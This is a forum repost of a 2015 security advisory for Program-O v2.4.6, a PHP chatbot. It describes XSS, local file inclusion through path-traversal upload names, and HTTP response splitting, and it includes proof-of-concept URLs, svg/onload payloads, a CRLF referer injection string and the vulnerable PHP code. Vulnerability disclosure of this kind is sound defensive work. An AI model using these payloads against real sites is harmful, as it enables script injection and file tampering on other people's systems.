Aerosol Posted January 23, 2015 Report Posted January 23, 2015 Program-O version 2.4.6 suffers from http response splitting, cross site scripting, and local file inclusion vulnerabilities.Document Title:===============Program-O v2.4.6 - Multiple Web VulnerabilitiesReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=1414Release Date:=============2015-01-21Vulnerability Laboratory ID (VL-ID):====================================1414Common Vulnerability Scoring System:====================================6.3Product & Service Introduction:===============================Welcome to the Program O Project website This is the home of the Open Source PHP MySQL AIML Chatbot Project. Program O is an AIML engine written in PHP with MySQL. Here you can find support, help, bot addons, a brilliant and friendly community and ofcourse the Program O download files.(Copy of the Vendor Homepage: http://blog.program-o.com/ )Abstract Advisory Information:==============================An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the official Program-O v2.4.6 web-application.Vulnerability Disclosure Timeline:==================================2015-01-21: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedAffected Product(s):====================Program OProduct: Program O AIML Chatbot - Web Application 2.4.6Exploitation Technique:=======================RemoteSeverity Level:===============HighProof of Concept (PoC):=======================1.1 Client-Side Cross Site Scripting VulnerabilityThe xss vulnerabilities can be exploited by remote attackers without privileged application user account and with low user interaction.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.http://localhost/Program-O/gui/xml/index.php?convo_id=444%22/%3E%3Csvg/onload=alert%281%29%3ECauseecho $convo_id;$post_vars = filter_input_array(INPUT_POST) : array();$get_vars = filter_input_array(INPUT_GET) : array();$request_vars = array_merge($get_vars, $post_vars);$convo_id = $request_vars['convo_id'] : get_convo_id ();1.2 Client-Side Cross Site Scripting Vulnerabilityhttp://localhost/Program-O/gui/xml/index.php/%22%3E%3Csvg/onload=alert%280%29%3E./Program-O/gui/xml/index.phpecho $_SERVER['PHP_SELF'];3. /logs/index.php$iframeURL = $_POST['file'] : 'about:blank'; echo $iframeURL;<form action="http://localhost/Program-O/logs/index.php" method="POST"><input type="hidden" name="file"value='paulos"/></iframe></div><svg/onload=alert(0)>'>2.1 Application-Side Cross Site Scripting VulnerabilityThe persistent input validation vulnerabilities can be exploited by remote attackers with low privileged application user account and with low user interaction.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue./admin/validateAIML.phpcause because ofecho $status;$status = "File $fileName is valid.<br />\n";giving valid AIML files names like <svg/onload=alert(0)> should do the trick2.2 Application-Side Cross Site Scripting Vulnerability (Only in older php server versions)/admin/file.phpprint "File <strong>$req_file</strong> doesn't exist.";$req_file = basename($_GET['file']);exploit ?file=">>payload3. File Manipulation - Local File IncludeThe local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue./admin/validateAIML.phpCause because of,move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))$target = $uploadDir . $ip . '/' . $tf;$uploadDir = _UPLOAD_PATH_;define('_UPLOAD_PATH_', _CONF_PATH_ . 'uploads' .$path_separator); // global_config.php define()define('_CONF_PATH_', _BASE_PATH_ . 'config' . $path_separator);// global_config.php define()define('_BASE_PATH_', $parentFolder); // global_config.php define()Exploitation is to give your file(s) names like ../../../file so whenthey got uploaded, they can cause LFI4. LFI, File Manipulation (RCE in some special cases only!)The local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue./admin/upload_old.phpmove_uploaded_file($_FILES['aimlfile']['tmp_name'], $file))$file = './uploads/' . $_FILES['aimlfile']['name'];exact same issues in admin/upload.php5.1 HTTP Response Splitting (CRLF)The HTTP Response Splitting issues can be exploited by remote attackers without privileged application user account and with medium or high user interaction.For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.header("Refresh: 5; url=$whoami?file=$req_file&send_file=yes");$whoami = basename(__FILE__);$req_file = basename($_GET['file']);5.2 HTTP Response Splitting (CRLF)/admin/download.phpcause,$referer = $_SERVER['HTTP_REFERER'];header("Refresh: 5;url=file.php?file=$zipFilename&send_file=yes&referer=$referer&msg=$msg");So as long as we spoof our referer to %0A%0DContent-Injection:goes-hereSecurity Risk:==============1.1 - 1.2The security risk of the client-side cross site scripting vulnerabilities is estimated as medium. (CVSS 2.6)2.1 - 2.2The security risk of the application-side input validation web vulnerabilities are estimated as medium. (CVSS 3.7)3.0The security risk of the local file include web vulnerability is estimated as high. (CVSS 6.1)4.0The security risk of the local file manipulation issue and code execution vulnerability is estimated as high. (CVSS 6.4).Credits & Authors:==================Paulos Yibelo (paulosyibelo.com)Source Quote
